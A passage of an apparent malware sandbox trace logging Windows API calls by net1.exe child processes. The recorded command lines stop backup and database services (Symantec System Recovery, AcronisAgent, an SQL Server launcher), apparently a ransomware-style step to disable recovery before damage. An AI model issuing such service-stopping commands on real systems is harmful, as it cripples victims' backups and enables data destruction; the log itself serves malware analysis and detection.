dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xa86 [0127.252] _wcsnicmp (_String1="NET stop “Symantec", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.252] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x54 [0127.252] _wcsnicmp (_String1="NET stop “Symantec", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.252] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xad [0127.252] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0127.252] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x2e [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x7d [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x26 [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x19 [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x1b [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xbe [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x33 [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x19 [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xc1 [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x16 [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x33 [0127.253] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0127.253] LocalFree (hMem=0x3d9508) returned 0x0 [0127.253] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x234 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x13 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x14 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x14 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x15 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x15 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x16 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x11 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x14 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x12 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0xf [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.254] LocalFree (hMem=0x3d9508) returned 0x0 [0127.254] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x17 [0127.254] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.255] LocalFree (hMem=0x3d9508) returned 0x0 [0127.255] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x18 [0127.255] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0127.255] LocalFree (hMem=0x3d9508) returned 0x0 [0127.255] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x2a [0127.255] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0127.255] LocalFree (hMem=0x3d9508) returned 0x0 [0127.255] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2ff978, nSize=0x0, Arguments=0x2ff974 | out: lpBuffer="锈=⡋盺侮/锈=塞/") returned 0x15 [0127.255] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0127.255] GetFileType (hFile=0x0) returned 0x0 [0127.255] GetConsoleOutputCP () returned 0x1b5 [0127.255] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0127.255] malloc (_Size=0x16) returned 0x3a26d0 [0127.255] GetConsoleOutputCP () returned 0x1b5 [0127.255] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x3a26d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0127.255] WriteFile (in: hFile=0x0, lpBuffer=0x3a26d0, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x2ff994, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff994, lpOverlapped=0x0) returned 0 [0127.255] free (_Block=0x3a26d0) [0127.255] LocalFree (hMem=0x3d9508) returned 0x0 [0127.256] NetApiBufferFree (Buffer=0x3d1b10) returned 0x0 [0127.256] NetApiBufferFree (Buffer=0x3d1b28) returned 0x0 [0127.256] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Symantec System Recovery” /y" [0127.256] exit (_Code=1) Process: id = "292" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x59b53000" os_pid = "0x1190" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "130" os_parent_pid = "0xea0" cmd_line = "C:\\Windows\\system32\\net1 stop AcronisAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 698 os_tid = 0xf8c [0126.051] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31f884 | out: lpSystemTimeAsFileTime=0x31f884*(dwLowDateTime=0x1edf6bb0, dwHighDateTime=0x1d6f0d1)) [0126.051] GetCurrentProcessId () returned 0x1190 [0126.051] GetCurrentThreadId () returned 0xf8c [0126.051] GetTickCount () returned 0x1152c10 [0126.051] QueryPerformanceCounter (in: lpPerformanceCount=0x31f87c | out: lpPerformanceCount=0x31f87c*=24515178606) returned 1 [0126.051] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.051] __set_app_type (_Type=0x1) [0126.051] __p__fmode () returned 0x770331f4 [0126.051] __p__commode () returned 0x770331fc [0126.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.052] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.052] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.052] GetConsoleOutputCP () returned 0x1b5 [0126.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.053] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.056] sprintf_s (in: _DstBuf=0x31f83c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.056] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0126.058] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.058] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent /y" [0126.058] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31f608, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.058] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x6c) returned 0x363ae0 [0126.059] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.059] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f80c | out: Buffer=0x31f80c*=0x361ae8) returned 0x0 [0126.059] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31f80c | out: Buffer=0x31f80c*=0x361b00) returned 0x0 [0126.059] _fileno (_File=0x77032900) returned -2 [0126.059] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.059] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.059] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.059] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.059] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.059] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.059] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.059] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.059] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.059] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.059] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.059] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.059] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.059] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.059] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.059] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.059] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.059] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.059] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.059] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.059] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.059] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.059] _wcsicmp (_String1="accounts", _String2="AcronisAgent") returned -15 [0126.059] _wcsicmp (_String1="computer", _String2="AcronisAgent") returned 2 [0126.060] _wcsicmp (_String1="config", _String2="AcronisAgent") returned 2 [0126.060] _wcsicmp (_String1="continue", _String2="AcronisAgent") returned 2 [0126.060] _wcsicmp (_String1="cont", _String2="AcronisAgent") returned 2 [0126.060] _wcsicmp (_String1="file", _String2="AcronisAgent") returned 5 [0126.060] _wcsicmp (_String1="files", _String2="AcronisAgent") returned 5 [0126.060] _wcsicmp (_String1="group", _String2="AcronisAgent") returned 6 [0126.060] _wcsicmp (_String1="groups", _String2="AcronisAgent") returned 6 [0126.060] _wcsicmp (_String1="help", _String2="AcronisAgent") returned 7 [0126.060] _wcsicmp (_String1="helpmsg", _String2="AcronisAgent") returned 7 [0126.060] _wcsicmp (_String1="localgroup", _String2="AcronisAgent") returned 11 [0126.060] _wcsicmp (_String1="pause", _String2="AcronisAgent") returned 15 [0126.060] _wcsicmp (_String1="session", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="sessions", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="sess", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="share", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="start", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="stats", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="statistics", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="stop", _String2="AcronisAgent") returned 18 [0126.060] _wcsicmp (_String1="time", _String2="AcronisAgent") returned 19 [0126.060] _wcsicmp (_String1="user", _String2="AcronisAgent") returned 20 [0126.060] _wcsicmp (_String1="users", _String2="AcronisAgent") returned 20 [0126.060] _wcsicmp (_String1="msg", _String2="AcronisAgent") returned 12 [0126.060] _wcsicmp (_String1="messenger", _String2="AcronisAgent") returned 12 [0126.060] _wcsicmp (_String1="receiver", _String2="AcronisAgent") returned 17 [0126.060] _wcsicmp (_String1="rcv", _String2="AcronisAgent") returned 17 [0126.060] _wcsicmp (_String1="netpopup", _String2="AcronisAgent") returned 13 [0126.060] _wcsicmp (_String1="redirector", _String2="AcronisAgent") returned 17 [0126.060] _wcsicmp (_String1="redir", _String2="AcronisAgent") returned 17 [0126.060] _wcsicmp (_String1="rdr", _String2="AcronisAgent") returned 17 [0126.060] _wcsicmp (_String1="workstation", _String2="AcronisAgent") returned 22 [0126.060] _wcsicmp (_String1="work", _String2="AcronisAgent") returned 22 [0126.060] _wcsicmp (_String1="wksta", _String2="AcronisAgent") returned 22 [0126.061] _wcsicmp (_String1="prdr", _String2="AcronisAgent") returned 15 [0126.061] _wcsicmp (_String1="devrdr", _String2="AcronisAgent") returned 3 [0126.061] _wcsicmp (_String1="lanmanworkstation", _String2="AcronisAgent") returned 11 [0126.061] _wcsicmp (_String1="server", _String2="AcronisAgent") returned 18 [0126.061] _wcsicmp (_String1="svr", _String2="AcronisAgent") returned 18 [0126.061] _wcsicmp (_String1="srv", _String2="AcronisAgent") returned 18 [0126.061] _wcsicmp (_String1="lanmanserver", _String2="AcronisAgent") returned 11 [0126.061] _wcsicmp (_String1="alerter", _String2="AcronisAgent") returned 9 [0126.061] _wcsicmp (_String1="netlogon", _String2="AcronisAgent") returned 13 [0126.061] _wcsupr (in: _String="AcronisAgent" | out: _String="ACRONISAGENT") returned="ACRONISAGENT" [0126.061] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3654b0 [0126.606] GetServiceKeyNameW (in: hSCManager=0x3654b0, lpDisplayName="ACRONISAGENT", lpServiceName=0xe5aaf0, lpcchBuffer=0x31f7a8 | out: lpServiceName="", lpcchBuffer=0x31f7a8) returned 0 [0126.606] _wcsicmp (_String1="msg", _String2="ACRONISAGENT") returned 12 [0126.606] _wcsicmp (_String1="messenger", _String2="ACRONISAGENT") returned 12 [0126.607] _wcsicmp (_String1="receiver", _String2="ACRONISAGENT") returned 17 [0126.607] _wcsicmp (_String1="rcv", _String2="ACRONISAGENT") returned 17 [0126.607] _wcsicmp (_String1="redirector", _String2="ACRONISAGENT") returned 17 [0126.607] _wcsicmp (_String1="redir", _String2="ACRONISAGENT") returned 17 [0126.607] _wcsicmp (_String1="rdr", _String2="ACRONISAGENT") returned 17 [0126.607] _wcsicmp (_String1="workstation", _String2="ACRONISAGENT") returned 22 [0126.607] _wcsicmp (_String1="work", _String2="ACRONISAGENT") returned 22 [0126.607] _wcsicmp (_String1="wksta", _String2="ACRONISAGENT") returned 22 [0126.607] _wcsicmp (_String1="prdr", _String2="ACRONISAGENT") returned 15 [0126.607] _wcsicmp (_String1="devrdr", _String2="ACRONISAGENT") returned 3 [0126.607] _wcsicmp (_String1="lanmanworkstation", _String2="ACRONISAGENT") returned 11 [0126.607] _wcsicmp (_String1="server", _String2="ACRONISAGENT") returned 18 [0126.607] _wcsicmp (_String1="svr", _String2="ACRONISAGENT") returned 18 [0126.607] _wcsicmp (_String1="srv", _String2="ACRONISAGENT") returned 18 [0126.607] _wcsicmp (_String1="lanmanserver", _String2="ACRONISAGENT") returned 11 [0126.607] _wcsicmp (_String1="alerter", _String2="ACRONISAGENT") returned 9 [0126.607] _wcsicmp (_String1="netlogon", _String2="ACRONISAGENT") returned 13 [0126.607] NetServiceControl (in: servername=0x0, service="ACRONISAGENT", opcode=0x0, arg=0x0, bufptr=0x31f7a4 | out: bufptr=0x31f7a4) returned 0x889 [0126.608] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.609] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.609] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.610] GetFileType (hFile=0x0) returned 0x0 [0126.610] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x363ed0 [0126.610] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x363ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.610] WriteFile (in: hFile=0x0, lpBuffer=0x363ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x31f6e4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f6e4, lpOverlapped=0x0) returned 0 [0126.610] LocalFree (hMem=0x363ed0) returned 0x0 [0126.610] GetFileType (hFile=0x0) returned 0x0 [0126.610] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x366178 [0126.610] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x366178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0126.611] WriteFile (in: hFile=0x0, lpBuffer=0x366178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f6e4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f6e4, lpOverlapped=0x0) returned 0 [0126.611] LocalFree (hMem=0x366178) returned 0x0 [0126.611] _ultow (in: _Dest=0x889, _Radix=3274516 | out: _Dest=0x889) returned="2185" [0126.611] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.611] GetFileType (hFile=0x0) returned 0x0 [0126.611] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x366178 [0126.611] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x366178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.611] WriteFile (in: hFile=0x0, lpBuffer=0x366178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x31f6f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f6f0, lpOverlapped=0x0) returned 0 [0126.611] LocalFree (hMem=0x366178) returned 0x0 [0126.611] GetFileType (hFile=0x0) returned 0x0 [0126.611] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x366178 [0126.611] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x366178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0126.611] WriteFile (in: hFile=0x0, lpBuffer=0x366178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31f6f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31f6f0, lpOverlapped=0x0) returned 0 [0126.611] LocalFree (hMem=0x366178) returned 0x0 [0126.612] NetApiBufferFree (Buffer=0x361ae8) returned 0x0 [0126.612] NetApiBufferFree (Buffer=0x361b00) returned 0x0 [0126.612] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AcronisAgent /y" [0126.612] exit (_Code=2) Process: id = "293" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x60233000" os_pid = "0xa90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "133" os_parent_pid = "0xf1c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 699 os_tid = 0xb60 [0126.087] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfeb4 | out: lpSystemTimeAsFileTime=0x2dfeb4*(dwLowDateTime=0x1ee42e70, dwHighDateTime=0x1d6f0d1)) [0126.087] GetCurrentProcessId () 